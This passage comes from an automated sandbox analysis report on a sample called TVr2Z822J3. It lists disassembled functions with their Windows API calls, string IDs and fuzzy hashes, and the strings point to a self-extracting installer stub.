                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$HandleItemLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1889686859-0
                                                                                                                  • Opcode ID: 54e99e0b53345dbf389ae49fdb6e6d7c6227533794aadf34278c182137d853b4
                                                                                                                  • Instruction ID: b6a50195b8a608de49edc5b96f3e83ee8a9b90890169e94b1220211b89b9884f
                                                                                                                  • Opcode Fuzzy Hash: 54e99e0b53345dbf389ae49fdb6e6d7c6227533794aadf34278c182137d853b4
                                                                                                                  • Instruction Fuzzy Hash: E861D47064C7096AE9257B61DC4AF3B3699AB40B05F10447FF642B92D2DBBCBC0056AF
                                                                                                                  APIs
                                                                                                                  • GetParent.USER32(?), ref: 00406F45
                                                                                                                  • GetWindowLongW.USER32(00000000), ref: 00406F4C
                                                                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 00406F62
                                                                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 00406F7F
                                                                                                                  • GetSystemMetrics.USER32(00000031), ref: 00406F91
                                                                                                                  • GetSystemMetrics.USER32(00000032), ref: 00406F98
                                                                                                                  • GetWindowDC.USER32(?), ref: 00406FAA
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00406FB7
                                                                                                                  • DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 00406FEB
                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00406FF3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2586545124-0
                                                                                                                  • Opcode ID: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
                                                                                                                  • Instruction ID: b1ff7c23223d170b9333fa97acec74f2c9230ee3eabfe87d0be763292bfdf634
                                                                                                                  • Opcode Fuzzy Hash: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
                                                                                                                  • Instruction Fuzzy Hash: 8E210C7650021ABFCF01AFA8DD48DDF7F69FB08351F008565FA15E21A0C775EA209B64
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,000004B3), ref: 0040678E
                                                                                                                  • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067A1
                                                                                                                  • GetDlgItem.USER32(?,000004B4), ref: 004067AB
                                                                                                                  • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067B3
                                                                                                                  • SendMessageW.USER32(?,00000401,?,00000000), ref: 004067C3
                                                                                                                  • GetDlgItem.USER32(?,?), ref: 004067CC
                                                                                                                  • SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 004067D4
                                                                                                                  • GetDlgItem.USER32(?,?), ref: 004067DD
                                                                                                                  • SetFocus.USER32(00000000,?,000004B4,771B0E50,00407E06,000004B4,000004B3,00000000,000004B4,00000000,000004B2,?,000004B7), ref: 004067E0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ItemMessageSend$Focus
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3946207451-0
                                                                                                                  • Opcode ID: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
                                                                                                                  • Instruction ID: e7a8c5b21de344c7c4c5496bf688f1d5cc3ba414acf11b32f4788b893cc62525
                                                                                                                  • Opcode Fuzzy Hash: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
                                                                                                                  • Instruction Fuzzy Hash: 6FF04F712403087BEA212B61DD86F5BBA6EEF81B45F018425F340650F0CBF7EC109A28
                                                                                                                  APIs
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,00000000), ref: 0040C603
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@
                                                                                                                  • String ID: IA$IA$IA$IA$IA$IA
                                                                                                                  • API String ID: 613200358-3743982587
                                                                                                                  • Opcode ID: 6e54149e8c3d77333b16b378dc95c38791a09178c73359331ff936fd258cd747
                                                                                                                  • Instruction ID: 4cebfcab61734def35128a955d6a3e34031d8899c11ca8f9bd2aeb72941b6852
                                                                                                                  • Opcode Fuzzy Hash: 6e54149e8c3d77333b16b378dc95c38791a09178c73359331ff936fd258cd747
                                                                                                                  • Instruction Fuzzy Hash: D2221671900248DFCB24EF65C8D09EEBBB5FF48304F50852EE91AA7291DB38A945CF58
                                                                                                                  APIs
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,00417788,00000000,SetEnvironment), ref: 00408479
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@
                                                                                                                  • String ID: BeginPrompt$ErrorTitle$FinishMessage$HelpText$SetEnvironment$WarningTitle
                                                                                                                  • API String ID: 613200358-994561823
                                                                                                                  • Opcode ID: 971dcdd12a827a4034ed94f9ba1d623efd1f14b2bcca4d73e06b44b648e667ed
                                                                                                                  • Instruction ID: 5566f9f9667118f06bc812855c9affabb63102f3a10b3971892d5eca1131561f
                                                                                                                  • Opcode Fuzzy Hash: 971dcdd12a827a4034ed94f9ba1d623efd1f14b2bcca4d73e06b44b648e667ed
                                                                                                                  • Instruction Fuzzy Hash: CA51D47080420AAACF24AB559E85AFB7774EB20348F54443FF881722E1EF7D5D82D64E
                                                                                                                  APIs
                                                                                                                  • memcpy.MSVCRT(?,00417410,00000160), ref: 00406DD1
                                                                                                                  • SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 00406DF0
                                                                                                                  • GetDC.USER32(00000000), ref: 00406DFB
                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00406E07
                                                                                                                  • MulDiv.KERNEL32(?,00000048,00000000), ref: 00406E16
                                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 00406E24
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00406E4C
                                                                                                                  • DialogBoxIndirectParamW.USER32(00000000,?,?,Function_0000667A), ref: 00406E81
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2693764856-0
                                                                                                                  • Opcode ID: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
                                                                                                                  • Instruction ID: b2c1943609947f3a034a1f42a4fd453b3666a2b5c4d4ccfd9a1c2059c5c1cb6f
                                                                                                                  • Opcode Fuzzy Hash: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
                                                                                                                  • Instruction Fuzzy Hash: C32184B5500218BFDB215F61DC45EEB7B7CFB08746F0040B6F609A1190D7748E948B65
                                                                                                                  APIs
                                                                                                                  • GetDC.USER32(?), ref: 0040696E
                                                                                                                  • GetSystemMetrics.USER32(0000000B), ref: 0040698A
                                                                                                                  • GetSystemMetrics.USER32(0000003D), ref: 00406993
                                                                                                                  • GetSystemMetrics.USER32(0000003E), ref: 0040699B
                                                                                                                  • SelectObject.GDI32(?,?), ref: 004069B8
                                                                                                                  • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 004069D3
                                                                                                                  • SelectObject.GDI32(?,?), ref: 004069F9
                                                                                                                  • ReleaseDC.USER32(?,?), ref: 00406A08
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2466489532-0
                                                                                                                  • Opcode ID: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
                                                                                                                  • Instruction ID: 7c755332e1b278278a0584394201b19561512224090c74d51841a9ad660c27ee
                                                                                                                  • Opcode Fuzzy Hash: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
                                                                                                                  • Instruction Fuzzy Hash: 6B216871900209EFCB119F65DD84A8EBFF4EF08321F10C46AE559A72A0C7359A50DF40
                                                                                                                  APIs
                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00407B6D
                                                                                                                  • GetDlgItem.USER32(?,000004B8), ref: 00407B8B
                                                                                                                  • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
                                                                                                                  • wsprintfW.USER32 ref: 00407BBB
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@ItemMessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                                                                                                  • String ID: %d%%
                                                                                                                  • API String ID: 3753976982-1518462796
                                                                                                                  • Opcode ID: 0b792d7adb6174ba2d50e5ca9cf87896ffea0db59519718aa7dbff65f529ef39
                                                                                                                  • Instruction ID: b955b8041d8a67620c3180d4911c799512bd6939d195f5b55c3092177650065a
                                                                                                                  • Opcode Fuzzy Hash: 0b792d7adb6174ba2d50e5ca9cf87896ffea0db59519718aa7dbff65f529ef39
                                                                                                                  • Instruction Fuzzy Hash: 1D31D371904208BBDB11AFA0CC45EDA7BB9EF48708F10847AFA42B61E1D779B904CB59
                                                                                                                  APIs
                                                                                                                  • lstrlenW.KERNEL32(hAA,00000020,?,?,00405838,?,?,?,00000000,?), ref: 004040A4
                                                                                                                    • Part of subcall function 00401A85: CharUpperW.USER32(?,771AE0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                                                                                                    • Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00404156
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040415E
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 0040416D
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00404175
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@$CharUpper$lstrlen
                                                                                                                  • String ID: hAA
                                                                                                                  • API String ID: 2587799592-1362906312
                                                                                                                  • Opcode ID: f1afb06a12cfea52e195ddd9e8ddb158cdff932f9735d488ba252034b153affa
                                                                                                                  • Instruction ID: 7f7e13310b21401de90169bcc26cd057e2afddf23eedd5de54135d69024cf91c
                                                                                                                  • Opcode Fuzzy Hash: f1afb06a12cfea52e195ddd9e8ddb158cdff932f9735d488ba252034b153affa
                                                                                                                  • Instruction Fuzzy Hash: D7212772D40215AACF20ABA4CC46AEB77B9DF90354F10407BEB41BB2E1E7789D848658
                                                                                                                  APIs
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000001,00000000,00000000,00000001,?,00000000), ref: 00404D3E
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DA0
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DB8
                                                                                                                    • Part of subcall function 00403354: lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
                                                                                                                    • Part of subcall function 00403354: GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
                                                                                                                    • Part of subcall function 00403354: GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
                                                                                                                    • Part of subcall function 00403354: ??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@$FileTime$AttributesSystemlstrlen
                                                                                                                  • String ID: 03A$;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                                                                  • API String ID: 4038993085-2279431206
                                                                                                                  • Opcode ID: 1e5f1ef11ab3d9e84330ff60a8d60345b5fdf25d940142a54a900a3d947b53ea
                                                                                                                  • Instruction ID: 637b7b13a9bcd1d52ea1019587bfa2fb4435f6835f564ae220b3123002230846
                                                                                                                  • Opcode Fuzzy Hash: 1e5f1ef11ab3d9e84330ff60a8d60345b5fdf25d940142a54a900a3d947b53ea
                                                                                                                  • Instruction Fuzzy Hash: CE312D71D0021EEACF05EF92CD429EEBBB4BF44318F10042BE911762E1DB785649DB98
                                                                                                                  APIs
                                                                                                                  • EndDialog.USER32(?,00000000), ref: 00407579
                                                                                                                  • KillTimer.USER32(?,00000001), ref: 0040758A
                                                                                                                  • SetTimer.USER32(?,00000001,00000000,00000000), ref: 004075B4
                                                                                                                  • SuspendThread.KERNEL32(00000290), ref: 004075CD
                                                                                                                  • ResumeThread.KERNEL32(00000290), ref: 004075EA
                                                                                                                  • EndDialog.USER32(?,00000000), ref: 0040760C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DialogThreadTimer$KillResumeSuspend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4151135813-0
                                                                                                                  • Opcode ID: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
                                                                                                                  • Instruction ID: ebb94c5c4675b2e6542c2b2cb7d5652cccd5624f9a00d71f737e39ca63bd9789
                                                                                                                  • Opcode Fuzzy Hash: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
                                                                                                                  • Instruction Fuzzy Hash: 9811BF70A08618BBD7212F15EE849E77BBDFB00756B00843AF523A05A0CB39BD00DA1D
                                                                                                                  APIs
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000028,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85
                                                                                                                    • Part of subcall function 00404343: ??3@YAXPAX@Z.MSVCRT(?,?,?,004177C4,004177C4,?,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 004043B6
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000028,004177C4,004177C4,00000000,00000028,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
                                                                                                                  • wsprintfA.USER32 ref: 00404EBC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@$wsprintf
                                                                                                                  • String ID: :Language:%u!$;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                                                                  • API String ID: 2704270482-1550708412
                                                                                                                  • Opcode ID: b3a647dc230e6375ba5304378dede3f86871d19815b7720c308d82744c7d9f3d
                                                                                                                  • Instruction ID: afe26c372a183c0ca4a1b7edc16cb7be903c3e4040aad79e05e22cec791dc9d0
                                                                                                                  • Opcode Fuzzy Hash: b3a647dc230e6375ba5304378dede3f86871d19815b7720c308d82744c7d9f3d
                                                                                                                  • Instruction Fuzzy Hash: D8115E71B00018BBCF00FB95CC42EFE77ADAB84705B10402EBA15E3182DB78AB028799
                                                                                                                  APIs
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000,00000000), ref: 004038C6
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000), ref: 00403904
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405), ref: 0040392A
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788), ref: 00403932
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@
                                                                                                                  • String ID: %%T/$%%T\
                                                                                                                  • API String ID: 613200358-2679640699
                                                                                                                  • Opcode ID: 9eec194740abc4bee078c15c8dc217b66edb47652cee4dab90ed516c3b80c8f9
                                                                                                                  • Instruction ID: 53c9ca64f2466311d4136dbbff57d229d1af9e29f5fa76e56e45344ae10c91f3
                                                                                                                  • Opcode Fuzzy Hash: 9eec194740abc4bee078c15c8dc217b66edb47652cee4dab90ed516c3b80c8f9
                                                                                                                  • Instruction Fuzzy Hash: 5011DD3190410EBACF05FFA1D857CEDBB79AE00708F50806AB511760E1EF79A785DB98
                                                                                                                  APIs
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403981
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 004039BF
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405), ref: 004039E5
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784), ref: 004039ED
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@
                                                                                                                  • String ID: %%S/$%%S\
                                                                                                                  • API String ID: 613200358-358529586
                                                                                                                  • Opcode ID: c94d4b60668bfb9eedf3143ce332dc4c41685f87d495a97f985edcc2faf71bca
                                                                                                                  • Instruction ID: c240205f9e12946546b7747d8fd44f392230bc1153c6614d6b8016afa5fd7689
                                                                                                                  • Opcode Fuzzy Hash: c94d4b60668bfb9eedf3143ce332dc4c41685f87d495a97f985edcc2faf71bca
                                                                                                                  • Instruction Fuzzy Hash: 1D11AD3190410EBACF05FFA1D856CEDBB79AE00708F51806AB511760E1EF78A789DB98
                                                                                                                  APIs
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403A3C
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 00403A7A
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405), ref: 00403AA0
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784), ref: 00403AA8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
